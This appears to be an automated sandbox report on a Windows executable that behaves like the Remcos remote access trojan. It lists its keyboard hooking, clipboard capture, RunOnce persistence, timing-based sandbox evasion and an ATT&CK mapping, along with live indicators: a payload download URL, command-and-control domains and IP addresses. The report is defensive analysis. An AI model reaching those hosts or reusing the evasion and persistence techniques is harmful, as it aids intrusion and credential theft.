              Source: x6yDsHJ9tr.exe, 00000004.00000002.4573513984.0000000006A90000.00000004.00001000.00020000.00000000.sdmpString found in binary or memory: https://teldrum.ro/NJrdZqNcCtz102.binOpklsLedcrestereamuschilor.ro/NJrdZqNcCtz102.bin
              Source: x6yDsHJ9tr.exe, 00000004.00000002.4573553882.0000000006AE4000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://teldrum.ro/NJrdZqNcCtz102.binTt
              Source: x6yDsHJ9tr.exe, 00000004.00000002.4573553882.0000000006AA8000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://teldrum.ro/NJrdZqNcCtz102.binZ
              Source: unknownNetwork traffic detected: HTTP traffic on port 49978 -> 443
              Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49978
              Source: unknownHTTPS traffic detected: 109.99.162.14:443 -> 192.168.2.5:49978 version: TLS 1.2

              Key, Mouse, Clipboard, Microphone and Screen Capturing

              barindex
              Source: C:\Users\user\Desktop\x6yDsHJ9tr.exeWindows user hook set: 0 keyboard low level C:\Users\user\Desktop\x6yDsHJ9tr.exeJump to behavior
              Source: C:\Users\user\Desktop\x6yDsHJ9tr.exeCode function: 0_2_00405846 GetDlgItem,GetDlgItem,GetDlgItem,GetDlgItem,GetClientRect,GetSystemMetrics,SendMessageW,SendMessageW,SendMessageW,SendMessageW,SendMessageW,SendMessageW,ShowWindow,ShowWindow,GetDlgItem,SendMessageW,SendMessageW,SendMessageW,GetDlgItem,CreateThread,CloseHandle,ShowWindow,ShowWindow,ShowWindow,ShowWindow,LdrInitializeThunk,SendMessageW,CreatePopupMenu,LdrInitializeThunk,AppendMenuW,GetWindowRect,TrackPopupMenu,SendMessageW,OpenClipboard,EmptyClipboard,GlobalAlloc,GlobalLock,SendMessageW,GlobalUnlock,SetClipboardData,CloseClipboard,0_2_00405846

              E-Banking Fraud

              barindex
              Source: Yara matchFile source: 00000004.00000002.4594924412.00000000368EE000.00000004.00000010.00020000.00000000.sdmp, type: MEMORY
              Source: Yara matchFile source: 00000004.00000002.4573553882.0000000006AE4000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
              Source: Yara matchFile source: 00000004.00000002.4573553882.0000000006B13000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
              Source: Yara matchFile source: 00000004.00000002.4573553882.0000000006AA8000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
              Source: Yara matchFile source: Process Memory Space: x6yDsHJ9tr.exe PID: 5064, type: MEMORYSTR
              Source: Yara matchFile source: C:\ProgramData\remcos\logs.dat, type: DROPPED
              Source: C:\Users\user\Desktop\x6yDsHJ9tr.exeProcess Stats: CPU usage > 49%
              Source: C:\Users\user\Desktop\x6yDsHJ9tr.exeCode function: 0_2_00403645 EntryPoint,SetErrorMode,GetVersionExW,GetVersionExW,GetVersionExW,lstrlenA,#17,OleInitialize,SHGetFileInfoW,GetCommandLineW,CharNextW,GetTempPathW,GetTempPathW,GetWindowsDirectoryW,lstrcatW,GetTempPathW,lstrcatW,SetEnvironmentVariableW,SetEnvironmentVariableW,SetEnvironmentVariableW,DeleteFileW,lstrlenW,LdrInitializeThunk,wsprintfW,GetFileAttributesW,DeleteFileW,LdrInitializeThunk,SetCurrentDirectoryW,LdrInitializeThunk,CopyFileW,OleUninitialize,ExitProcess,CloseHandle,GetCurrentProcess,OpenProcessToken,LookupPrivilegeValueW,AdjustTokenPrivileges,ExitWindowsEx,ExitProcess,0_2_00403645
              Source: C:\Users\user\Desktop\x6yDsHJ9tr.exeCode function: 0_2_00406DA00_2_00406DA0
              Source: C:\Users\user\Desktop\x6yDsHJ9tr.exeCode function: 0_2_73471BFF0_2_73471BFF
              Source: x6yDsHJ9tr.exeStatic PE information: RELOCS_STRIPPED, EXECUTABLE_IMAGE, LINE_NUMS_STRIPPED, LOCAL_SYMS_STRIPPED, 32BIT_MACHINE
              Source: classification engineClassification label: mal100.troj.spyw.evad.winEXE@3/10@17/2
              Source: C:\Users\user\Desktop\x6yDsHJ9tr.exeCode function: 0_2_00403645 EntryPoint,SetErrorMode,GetVersionExW,GetVersionExW,GetVersionExW,lstrlenA,#17,OleInitialize,SHGetFileInfoW,GetCommandLineW,CharNextW,GetTempPathW,GetTempPathW,GetWindowsDirectoryW,lstrcatW,GetTempPathW,lstrcatW,SetEnvironmentVariableW,SetEnvironmentVariableW,SetEnvironmentVariableW,DeleteFileW,lstrlenW,LdrInitializeThunk,wsprintfW,GetFileAttributesW,DeleteFileW,LdrInitializeThunk,SetCurrentDirectoryW,LdrInitializeThunk,CopyFileW,OleUninitialize,ExitProcess,CloseHandle,GetCurrentProcess,OpenProcessToken,LookupPrivilegeValueW,AdjustTokenPrivileges,ExitWindowsEx,ExitProcess,0_2_00403645
              Source: C:\Users\user\Desktop\x6yDsHJ9tr.exeCode function: 0_2_00404AF2 GetDlgItem,SetWindowTextW,LdrInitializeThunk,LdrInitializeThunk,SHBrowseForFolderW,CoTaskMemFree,lstrcmpiW,lstrcatW,SetDlgItemTextW,LdrInitializeThunk,GetDiskFreeSpaceW,MulDiv,SetDlgItemTextW,0_2_00404AF2
              Source: C:\Users\user\Desktop\x6yDsHJ9tr.exeCode function: 0_2_004021AF LdrInitializeThunk,CoCreateInstance,LdrInitializeThunk,0_2_004021AF
              Source: C:\Users\user\Desktop\x6yDsHJ9tr.exeFile created: C:\Users\user\eftermodnendesJump to behavior
              Source: C:\Users\user\Desktop\x6yDsHJ9tr.exeMutant created: \Sessions\1\BaseNamedObjects\Rmc-0B1XIG
              Source: C:\Users\user\Desktop\x6yDsHJ9tr.exeFile created: C:\Users\user\AppData\Local\Temp\nsuD808.tmpJump to behavior
              Source: x6yDsHJ9tr.exeStatic PE information: Section: .text IMAGE_SCN_CNT_CODE, IMAGE_SCN_MEM_EXECUTE, IMAGE_SCN_MEM_READ
              Source: C:\Users\user\Desktop\x6yDsHJ9tr.exeFile read: C:\Users\desktop.iniJump to behavior
              Source: C:\Users\user\Desktop\x6yDsHJ9tr.exeKey opened: HKEY_CURRENT_USER\Software\Policies\Microsoft\Windows\Safer\CodeIdentifiersJump to behavior
              Source: x6yDsHJ9tr.exeVirustotal: Detection: 34%
              Source: x6yDsHJ9tr.exeReversingLabs: Detection: 26%
              Source: C:\Users\user\Desktop\x6yDsHJ9tr.exeFile read: C:\Users\user\Desktop\x6yDsHJ9tr.exeJump to behavior
              Source: unknownProcess created: C:\Users\user\Desktop\x6yDsHJ9tr.exe "C:\Users\user\Desktop\x6yDsHJ9tr.exe"
              Source: C:\Users\user\Desktop\x6yDsHJ9tr.exeProcess created: C:\Users\user\Desktop\x6yDsHJ9tr.exe "C:\Users\user\Desktop\x6yDsHJ9tr.exe"
              Source: C:\Users\user\Desktop\x6yDsHJ9tr.exeProcess created: C:\Users\user\Desktop\x6yDsHJ9tr.exe "C:\Users\user\Desktop\x6yDsHJ9tr.exe"Jump to behavior
              Source: C:\Users\user\Desktop\x6yDsHJ9tr.exeSection loaded: uxtheme.dllJump to behavior
              Source: C:\Users\user\Desktop\x6yDsHJ9tr.exeSection loaded: userenv.dllJump to behavior
              Source: C:\Users\user\Desktop\x6yDsHJ9tr.exeSection loaded: apphelp.dllJump to behavior
              Source: C:\Users\user\Desktop\x6yDsHJ9tr.exeSection loaded: propsys.dllJump to behavior
              Source: C:\Users\user\Desktop\x6yDsHJ9tr.exeSection loaded: dwmapi.dllJump to behavior
              Source: C:\Users\user\Desktop\x6yDsHJ9tr.exeSection loaded: cryptbase.dllJump to behavior
              Source: C:\Users\user\Desktop\x6yDsHJ9tr.exeSection loaded: oleacc.dllJump to behavior
              Source: C:\Users\user\Desktop\x6yDsHJ9tr.exeSection loaded: ntmarta.dllJump to behavior
              Source: C:\Users\user\Desktop\x6yDsHJ9tr.exeSection loaded: version.dllJump to behavior
              Source: C:\Users\user\Desktop\x6yDsHJ9tr.exeSection loaded: shfolder.dllJump to behavior
              Source: C:\Users\user\Desktop\x6yDsHJ9tr.exeSection loaded: kernel.appcore.dllJump to behavior
              Source: C:\Users\user\Desktop\x6yDsHJ9tr.exeSection loaded: windows.storage.dllJump to behavior
              Source: C:\Users\user\Desktop\x6yDsHJ9tr.exeSection loaded: wldp.dllJump to behavior
              Source: C:\Users\user\Desktop\x6yDsHJ9tr.exeSection loaded: profapi.dllJump to behavior
              Source: C:\Users\user\Desktop\x6yDsHJ9tr.exeSection loaded: iertutil.dllJump to behavior
              Source: C:\Users\user\Desktop\x6yDsHJ9tr.exeSection loaded: sspicli.dllJump to behavior
              Source: C:\Users\user\Desktop\x6yDsHJ9tr.exeSection loaded: powrprof.dllJump to behavior
              Source: C:\Users\user\Desktop\x6yDsHJ9tr.exeSection loaded: winhttp.dllJump to behavior
              Source: C:\Users\user\Desktop\x6yDsHJ9tr.exeSection loaded: wkscli.dllJump to behavior
              Source: C:\Users\user\Desktop\x6yDsHJ9tr.exeSection loaded: netutils.dllJump to behavior
              Source: C:\Users\user\Desktop\x6yDsHJ9tr.exeSection loaded: umpdc.dllJump to behavior
              Source: C:\Users\user\Desktop\x6yDsHJ9tr.exeSection loaded: windows.storage.dllJump to behavior
              Source: C:\Users\user\Desktop\x6yDsHJ9tr.exeSection loaded: wldp.dllJump to behavior
              Source: C:\Users\user\Desktop\x6yDsHJ9tr.exeSection loaded: kernel.appcore.dllJump to behavior
              Source: C:\Users\user\Desktop\x6yDsHJ9tr.exeSection loaded: uxtheme.dllJump to behavior
              Source: C:\Users\user\Desktop\x6yDsHJ9tr.exeSection loaded: wininet.dllJump to behavior
              Source: C:\Users\user\Desktop\x6yDsHJ9tr.exeSection loaded: profapi.dllJump to behavior
              Source: C:\Users\user\Desktop\x6yDsHJ9tr.exeSection loaded: ondemandconnroutehelper.dllJump to behavior
              Source: C:\Users\user\Desktop\x6yDsHJ9tr.exeSection loaded: mswsock.dllJump to behavior
              Source: C:\Users\user\Desktop\x6yDsHJ9tr.exeSection loaded: iphlpapi.dllJump to behavior
              Source: C:\Users\user\Desktop\x6yDsHJ9tr.exeSection loaded: winnsi.dllJump to behavior
              Source: C:\Users\user\Desktop\x6yDsHJ9tr.exeSection loaded: urlmon.dllJump to behavior
              Source: C:\Users\user\Desktop\x6yDsHJ9tr.exeSection loaded: srvcli.dllJump to behavior
              Source: C:\Users\user\Desktop\x6yDsHJ9tr.exeSection loaded: dnsapi.dllJump to behavior
              Source: C:\Users\user\Desktop\x6yDsHJ9tr.exeSection loaded: rasadhlp.dllJump to behavior
              Source: C:\Users\user\Desktop\x6yDsHJ9tr.exeSection loaded: fwpuclnt.dllJump to behavior
              Source: C:\Users\user\Desktop\x6yDsHJ9tr.exeSection loaded: schannel.dllJump to behavior
              Source: C:\Users\user\Desktop\x6yDsHJ9tr.exeSection loaded: mskeyprotect.dllJump to behavior
              Source: C:\Users\user\Desktop\x6yDsHJ9tr.exeSection loaded: ntasn1.dllJump to behavior
              Source: C:\Users\user\Desktop\x6yDsHJ9tr.exeSection loaded: msasn1.dllJump to behavior
              Source: C:\Users\user\Desktop\x6yDsHJ9tr.exeSection loaded: dpapi.dllJump to behavior
              Source: C:\Users\user\Desktop\x6yDsHJ9tr.exeSection loaded: cryptsp.dllJump to behavior
              Source: C:\Users\user\Desktop\x6yDsHJ9tr.exeSection loaded: rsaenh.dllJump to behavior
              Source: C:\Users\user\Desktop\x6yDsHJ9tr.exeSection loaded: cryptbase.dllJump to behavior
              Source: C:\Users\user\Desktop\x6yDsHJ9tr.exeSection loaded: gpapi.dllJump to behavior
              Source: C:\Users\user\Desktop\x6yDsHJ9tr.exeSection loaded: ncrypt.dllJump to behavior
              Source: C:\Users\user\Desktop\x6yDsHJ9tr.exeSection loaded: ncryptsslp.dllJump to behavior
              Source: C:\Users\user\Desktop\x6yDsHJ9tr.exeSection loaded: winmm.dllJump to behavior
              Source: C:\Users\user\Desktop\x6yDsHJ9tr.exeKey value queried: HKEY_LOCAL_MACHINE\SOFTWARE\Classes\WOW6432Node\CLSID\{1f486a52-3cb1-48fd-8f50-b8dc300d9f9d}\InProcServer32Jump to behavior
              Source: C:\Users\user\Desktop\x6yDsHJ9tr.exeFile written: C:\Users\user\AppData\Local\Temp\Setup.iniJump to behavior
              Source: x6yDsHJ9tr.exeStatic PE information: DYNAMIC_BASE, NX_COMPAT, NO_SEH, TERMINAL_SERVER_AWARE
              Source: Binary string: mshtml.pdb source: x6yDsHJ9tr.exe, 00000004.00000001.3371870256.0000000000649000.00000020.00000001.01000000.00000007.sdmp
              Source: Binary string: mshtml.pdbUGP source: x6yDsHJ9tr.exe, 00000004.00000001.3371870256.0000000000649000.00000020.00000001.01000000.00000007.sdmp

              Data Obfuscation

              barindex
              Source: Yara matchFile source: 00000000.00000002.3373583635.0000000006C89000.00000040.00001000.00020000.00000000.sdmp, type: MEMORY
              Source: C:\Users\user\Desktop\x6yDsHJ9tr.exeCode function: 0_2_73471BFF GlobalAlloc,lstrcpyW,lstrcpyW,GlobalFree,GlobalFree,GlobalFree,GlobalFree,GlobalFree,GlobalFree,lstrcpyW,GetModuleHandleW,LoadLibraryW,GetProcAddress,lstrlenW,0_2_73471BFF
              Source: C:\Users\user\Desktop\x6yDsHJ9tr.exeCode function: 0_2_734730C0 push eax; ret 0_2_734730EE
              Source: C:\Users\user\Desktop\x6yDsHJ9tr.exeFile created: C:\Users\user\AppData\Local\Temp\nspD8D5.tmp\System.dllJump to dropped file
              Source: C:\Users\user\Desktop\x6yDsHJ9tr.exeFile created: C:\Users\user\AppData\Local\Temp\fejlbetjening\Rockerfest.batJump to dropped file
              Source: C:\Users\user\Desktop\x6yDsHJ9tr.exeFile created: C:\Users\user\AppData\Local\Temp\fejlbetjening\Rockerfest.batJump to dropped file
              Source: C:\Users\user\Desktop\x6yDsHJ9tr.exeRegistry value created or modified: HKEY_CURRENT_USER\SOFTWARE\Microsoft\Windows\CurrentVersion\RunOnce UnvanquishedJump to behavior
              Source: C:\Users\user\Desktop\x6yDsHJ9tr.exeRegistry value created or modified: HKEY_CURRENT_USER\SOFTWARE\Microsoft\Windows\CurrentVersion\RunOnce UnvanquishedJump to behavior
              Source: C:\Users\user\Desktop\x6yDsHJ9tr.exeRegistry value created or modified: HKEY_CURRENT_USER\SOFTWARE\Microsoft\Windows\CurrentVersion\RunOnce UnvanquishedJump to behavior
              Source: C:\Users\user\Desktop\x6yDsHJ9tr.exeRegistry value created or modified: HKEY_CURRENT_USER\SOFTWARE\Microsoft\Windows\CurrentVersion\RunOnce UnvanquishedJump to behavior
              Source: C:\Users\user\Desktop\x6yDsHJ9tr.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Users\user\Desktop\x6yDsHJ9tr.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Users\user\Desktop\x6yDsHJ9tr.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Users\user\Desktop\x6yDsHJ9tr.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Users\user\Desktop\x6yDsHJ9tr.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Users\user\Desktop\x6yDsHJ9tr.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Users\user\Desktop\x6yDsHJ9tr.exeProcess information set: NOOPENFILEERRORBOXJump to behavior

              Malware Analysis System Evasion

              barindex
              Source: C:\Users\user\Desktop\x6yDsHJ9tr.exeAPI/Special instruction interceptor: Address: 733EFF8
              Source: C:\Users\user\Desktop\x6yDsHJ9tr.exeAPI/Special instruction interceptor: Address: 5A4EFF8
              Source: C:\Users\user\Desktop\x6yDsHJ9tr.exeRDTSC instruction interceptor: First address: 730446B second address: 730446B instructions: 0x00000000 rdtsc 0x00000002 cmp ebx, 30F9070Dh 0x00000008 cmp ebx, ecx 0x0000000a jc 00007F98ED042D92h 0x0000000c test ebx, edx 0x0000000e inc ebp 0x0000000f inc ebx 0x00000010 rdtsc
              Source: C:\Users\user\Desktop\x6yDsHJ9tr.exeRDTSC instruction interceptor: First address: 5A1446B second address: 5A1446B instructions: 0x00000000 rdtsc 0x00000002 cmp ebx, 30F9070Dh 0x00000008 cmp ebx, ecx 0x0000000a jc 00007F98EC747692h 0x0000000c test ebx, edx 0x0000000e inc ebp 0x0000000f inc ebx 0x00000010 rdtsc
              Source: C:\Users\user\Desktop\x6yDsHJ9tr.exeWindow / User API: threadDelayed 3394Jump to behavior
              Source: C:\Users\user\Desktop\x6yDsHJ9tr.exeWindow / User API: threadDelayed 1035Jump to behavior
              Source: C:\Users\user\Desktop\x6yDsHJ9tr.exeWindow / User API: threadDelayed 4601Jump to behavior
              Source: C:\Users\user\Desktop\x6yDsHJ9tr.exeWindow / User API: foregroundWindowGot 1756Jump to behavior
              Source: C:\Users\user\Desktop\x6yDsHJ9tr.exeDropped PE file which has not been started: C:\Users\user\AppData\Local\Temp\nspD8D5.tmp\System.dllJump to dropped file
              Source: C:\Users\user\Desktop\x6yDsHJ9tr.exe TID: 4836Thread sleep count: 3394 > 30Jump to behavior
              Source: C:\Users\user\Desktop\x6yDsHJ9tr.exe TID: 6648Thread sleep count: 1035 > 30Jump to behavior
              Source: C:\Users\user\Desktop\x6yDsHJ9tr.exe TID: 6648Thread sleep time: -3105000s >= -30000sJump to behavior
              Source: C:\Users\user\Desktop\x6yDsHJ9tr.exe TID: 6648Thread sleep count: 4601 > 30Jump to behavior
              Source: C:\Users\user\Desktop\x6yDsHJ9tr.exe TID: 6648Thread sleep time: -13803000s >= -30000sJump to behavior
              Source: C:\Users\user\Desktop\x6yDsHJ9tr.exeThread sleep count: Count: 3394 delay: -5Jump to behavior
              Source: C:\Users\user\Desktop\x6yDsHJ9tr.exeCode function: 0_2_004069DF FindFirstFileW,FindClose,0_2_004069DF
              Source: C:\Users\user\Desktop\x6yDsHJ9tr.exeCode function: 0_2_00405D8E CloseHandle,GetTempPathW,DeleteFileW,lstrcatW,lstrcatW,lstrlenW,FindFirstFileW,FindNextFileW,FindClose,0_2_00405D8E
              Source: C:\Users\user\Desktop\x6yDsHJ9tr.exeCode function: 0_2_00402910 FindFirstFileW,0_2_00402910
              Source: x6yDsHJ9tr.exe, 00000004.00000002.4573553882.0000000006AFD000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: Hyper-V RAW
              Source: x6yDsHJ9tr.exe, 00000004.00000002.4573553882.0000000006AA8000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: Hyper-V RAWhN
              Source: C:\Users\user\Desktop\x6yDsHJ9tr.exeAPI call chain: ExitProcess graph end nodegraph_0-4369
              Source: C:\Users\user\Desktop\x6yDsHJ9tr.exeAPI call chain: ExitProcess graph end nodegraph_0-4597
              Source: C:\Users\user\Desktop\x6yDsHJ9tr.exeCode function: 0_2_00403645 EntryPoint,SetErrorMode,GetVersionExW,GetVersionExW,GetVersionExW,lstrlenA,#17,OleInitialize,SHGetFileInfoW,GetCommandLineW,CharNextW,GetTempPathW,GetTempPathW,GetWindowsDirectoryW,lstrcatW,GetTempPathW,lstrcatW,SetEnvironmentVariableW,SetEnvironmentVariableW,SetEnvironmentVariableW,DeleteFileW,lstrlenW,LdrInitializeThunk,wsprintfW,GetFileAttributesW,DeleteFileW,LdrInitializeThunk,SetCurrentDirectoryW,LdrInitializeThunk,CopyFileW,OleUninitialize,ExitProcess,CloseHandle,GetCurrentProcess,OpenProcessToken,LookupPrivilegeValueW,AdjustTokenPrivileges,ExitWindowsEx,ExitProcess,0_2_00403645
              Source: C:\Users\user\Desktop\x6yDsHJ9tr.exeCode function: 0_2_73471BFF GlobalAlloc,lstrcpyW,lstrcpyW,GlobalFree,GlobalFree,GlobalFree,GlobalFree,GlobalFree,GlobalFree,lstrcpyW,GetModuleHandleW,LoadLibraryW,GetProcAddress,lstrlenW,0_2_73471BFF
              Source: C:\Users\user\Desktop\x6yDsHJ9tr.exeProcess created: C:\Users\user\Desktop\x6yDsHJ9tr.exe "C:\Users\user\Desktop\x6yDsHJ9tr.exe"Jump to behavior
              Source: x6yDsHJ9tr.exe, 00000004.00000002.4573553882.0000000006AFD000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: Program ManagerIG\
              Source: x6yDsHJ9tr.exe, 00000004.00000002.4573553882.0000000006B51000.00000004.00000020.00020000.00000000.sdmp, x6yDsHJ9tr.exe, 00000004.00000002.4573553882.0000000006AFD000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: Program Manager
              Source: x6yDsHJ9tr.exe, 00000004.00000002.4573553882.0000000006AFD000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: Program ManagerM
              Source: x6yDsHJ9tr.exe, 00000004.00000002.4573553882.0000000006AFD000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: Program Manager7
              Source: x6yDsHJ9tr.exe, 00000004.00000002.4573553882.0000000006AFD000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: Program ManagerT
              Source: x6yDsHJ9tr.exe, 00000004.00000002.4573553882.0000000006B13000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: Program Manager@
              Source: x6yDsHJ9tr.exe, 00000004.00000002.4573553882.0000000006B13000.00000004.00000020.00020000.00000000.sdmp, x6yDsHJ9tr.exe, 00000004.00000002.4573553882.0000000006B51000.00000004.00000020.00020000.00000000.sdmp, x6yDsHJ9tr.exe, 00000004.00000002.4573553882.0000000006AA8000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: |Program Manager|
              Source: x6yDsHJ9tr.exe, 00000004.00000002.4573553882.0000000006AA8000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: [Program Manager]
              Source: C:\Users\user\Desktop\x6yDsHJ9tr.exeCode function: 0_2_00403645 EntryPoint,SetErrorMode,GetVersionExW,GetVersionExW,GetVersionExW,lstrlenA,#17,OleInitialize,SHGetFileInfoW,GetCommandLineW,CharNextW,GetTempPathW,GetTempPathW,GetWindowsDirectoryW,lstrcatW,GetTempPathW,lstrcatW,SetEnvironmentVariableW,SetEnvironmentVariableW,SetEnvironmentVariableW,DeleteFileW,lstrlenW,LdrInitializeThunk,wsprintfW,GetFileAttributesW,DeleteFileW,LdrInitializeThunk,SetCurrentDirectoryW,LdrInitializeThunk,CopyFileW,OleUninitialize,ExitProcess,CloseHandle,GetCurrentProcess,OpenProcessToken,LookupPrivilegeValueW,AdjustTokenPrivileges,ExitWindowsEx,ExitProcess,0_2_00403645

              Stealing of Sensitive Information

              barindex
              Source: Yara matchFile source: 00000004.00000002.4594924412.00000000368EE000.00000004.00000010.00020000.00000000.sdmp, type: MEMORY
              Source: Yara matchFile source: 00000004.00000002.4573553882.0000000006AE4000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
              Source: Yara matchFile source: 00000004.00000002.4573553882.0000000006B13000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
              Source: Yara matchFile source: 00000004.00000002.4573553882.0000000006AA8000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
              Source: Yara matchFile source: Process Memory Space: x6yDsHJ9tr.exe PID: 5064, type: MEMORYSTR
              Source: Yara matchFile source: C:\ProgramData\remcos\logs.dat, type: DROPPED

              Remote Access Functionality

              barindex
              Source: C:\Users\user\Desktop\x6yDsHJ9tr.exeMutex created: \Sessions\1\BaseNamedObjects\Rmc-0B1XIGJump to behavior
              Source: Yara matchFile source: 00000004.00000002.4594924412.00000000368EE000.00000004.00000010.00020000.00000000.sdmp, type: MEMORY
              Source: Yara matchFile source: 00000004.00000002.4573553882.0000000006AE4000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
              Source: Yara matchFile source: 00000004.00000002.4573553882.0000000006B13000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
              Source: Yara matchFile source: 00000004.00000002.4573553882.0000000006AA8000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
              Source: Yara matchFile source: Process Memory Space: x6yDsHJ9tr.exe PID: 5064, type: MEMORYSTR
              Source: Yara matchFile source: C:\ProgramData\remcos\logs.dat, type: DROPPED
              ReconnaissanceResource DevelopmentInitial AccessExecutionPersistencePrivilege EscalationDefense EvasionCredential AccessDiscoveryLateral MovementCollectionCommand and ControlExfiltrationImpact
              Gather Victim Identity InformationAcquire InfrastructureValid Accounts1
              Native API
              1
              Registry Run Keys / Startup Folder
              1
              Access Token Manipulation
              11
              Masquerading
              11
              Input Capture
              31
              Security Software Discovery
              Remote Services11
              Input Capture
              11
              Encrypted Channel
              Exfiltration Over Other Network Medium1
              System Shutdown/Reboot
              CredentialsDomainsDefault AccountsScheduled Task/Job1
              DLL Side-Loading
              12
              Process Injection
              2
              Virtualization/Sandbox Evasion
              LSASS Memory2
              Virtualization/Sandbox Evasion
              Remote Desktop Protocol1
              Archive Collected Data
              1
              Non-Standard Port
              Exfiltration Over BluetoothNetwork Denial of Service
              Email AddressesDNS ServerDomain AccountsAtLogon Script (Windows)1
              Registry Run Keys / Startup Folder
              1
              Access Token Manipulation
              Security Account Manager1
              Process Discovery
              SMB/Windows Admin Shares1
              Clipboard Data
              1
              Remote Access Software
              Automated ExfiltrationData Encrypted for Impact
              Employee NamesVirtual Private ServerLocal AccountsCronLogin Hook1
              DLL Side-Loading
              12
              Process Injection
              NTDS1
              Application Window Discovery
              Distributed Component Object ModelInput Capture1
              Ingress Tool Transfer
              Traffic DuplicationData Destruction
              Gather Victim Network InformationServerCloud AccountsLaunchdNetwork Logon ScriptNetwork Logon Script1
              Obfuscated Files or Information
              LSA Secrets3
              File and Directory Discovery
              SSHKeylogging2
              Non-Application Layer Protocol
              Scheduled TransferData Encrypted for Impact
              Domain PropertiesBotnetReplication Through Removable MediaScheduled TaskRC ScriptsRC Scripts1
              DLL Side-Loading
              Cached Domain Credentials23
              System Information Discovery
              VNCGUI Input Capture113
              Application Layer Protocol
              Data Transfer Size LimitsService Stop
              Hide Legend

              Legend:

              • Process
              • Signature
              • Created File
              • DNS/IP Info
              • Is Dropped
              • Is Windows Process
              • Number of created Registry Values
              • Number of created Files
              • Visual Basic
              • Delphi
              • Java
              • .Net C# or VB.NET
              • C, C++ or other language
              • Is malicious
              • Internet

              This section contains all screenshots as thumbnails, including those not shown in the slideshow.


              windows-stand
              SourceDetectionScannerLabelLink
              x6yDsHJ9tr.exe35%VirustotalBrowse
              x6yDsHJ9tr.exe26%ReversingLabs
              SourceDetectionScannerLabelLink
              C:\Users\user\AppData\Local\Temp\fejlbetjening\Rockerfest.bat26%ReversingLabs
              C:\Users\user\AppData\Local\Temp\nspD8D5.tmp\System.dll0%ReversingLabs
              No Antivirus matches
              No Antivirus matches
              SourceDetectionScannerLabelLink
              https://teldrum.ro/NJrdZqNcCtz102.binTt0%Avira URL Cloudsafe
              https://teldrum.ro/NJrdZqNcCtz102.bin0%Avira URL Cloudsafe
              linktreewealth.zapto.org0%Avira URL Cloudsafe
              https://teldrum.ro/NJrdZqNcCtz102.bin00%Avira URL Cloudsafe
              https://teldrum.ro/NJrdZqNcCtz102.binOpklsLedcrestereamuschilor.ro/NJrdZqNcCtz102.bin0%Avira URL Cloudsafe
              https://teldrum.ro/0%Avira URL Cloudsafe
              https://teldrum.ro/NJrdZqNcCtz102.binZ0%Avira URL Cloudsafe
              linktreewealthy.zapto.org0%Avira URL Cloudsafe
              https://teldrum.ro/&0%Avira URL Cloudsafe
              NameIPActiveMaliciousAntivirus DetectionReputation
              linktreewealth.zapto.org
              43.226.229.209
              truetrue
                unknown
                teldrum.ro
                109.99.162.14
                truefalse
                  unknown
                  linktreewealthy.zapto.org
                  unknown
                  unknowntrue
                    unknown
                    NameMaliciousAntivirus DetectionReputation
                    https://teldrum.ro/NJrdZqNcCtz102.binfalse
                    • Avira URL Cloud: safe
                    unknown
                    linktreewealth.zapto.orgtrue
                    • Avira URL Cloud: safe
                    unknown
                    linktreewealthy.zapto.orgtrue
                    • Avira URL Cloud: safe
                    unknown
                    NameSourceMaliciousAntivirus DetectionReputation
                    https://teldrum.ro/NJrdZqNcCtz102.bin0x6yDsHJ9tr.exe, 00000004.00000002.4573553882.0000000006AA8000.00000004.00000020.00020000.00000000.sdmpfalse
                    • Avira URL Cloud: safe
                    unknown
                    https://teldrum.ro/NJrdZqNcCtz102.binTtx6yDsHJ9tr.exe, 00000004.00000002.4573553882.0000000006AE4000.00000004.00000020.00020000.00000000.sdmpfalse
                    • Avira URL Cloud: safe
                    unknown
                    http://www.w3c.org/TR/1999/REC-html401-19991224/frameset.dtdx6yDsHJ9tr.exe, 00000004.00000001.3371870256.00000000005F2000.00000020.00000001.01000000.00000007.sdmpfalse
                      high
                      https://inference.location.live.net/inferenceservice/v21/Pox/GetLocationUsingFingerprinte1e71f6b-214x6yDsHJ9tr.exe, 00000004.00000001.3371870256.0000000000649000.00000020.00000001.01000000.00000007.sdmpfalse
                        high
                        https://teldrum.ro/NJrdZqNcCtz102.binOpklsLedcrestereamuschilor.ro/NJrdZqNcCtz102.binx6yDsHJ9tr.exe, 00000004.00000002.4573513984.0000000006A90000.00000004.00001000.00020000.00000000.sdmpfalse
                        • Avira URL Cloud: safe
                        unknown
                        http://www.w3c.org/TR/1999/REC-html401-19991224/loose.dtdx6yDsHJ9tr.exe, 00000004.00000001.3371870256.00000000005F2000.00000020.00000001.01000000.00000007.sdmpfalse
                          high
                          http://www.ftp.ftp://ftp.gopher.x6yDsHJ9tr.exe, 00000004.00000001.3371870256.0000000000649000.00000020.00000001.01000000.00000007.sdmpfalse
                            high
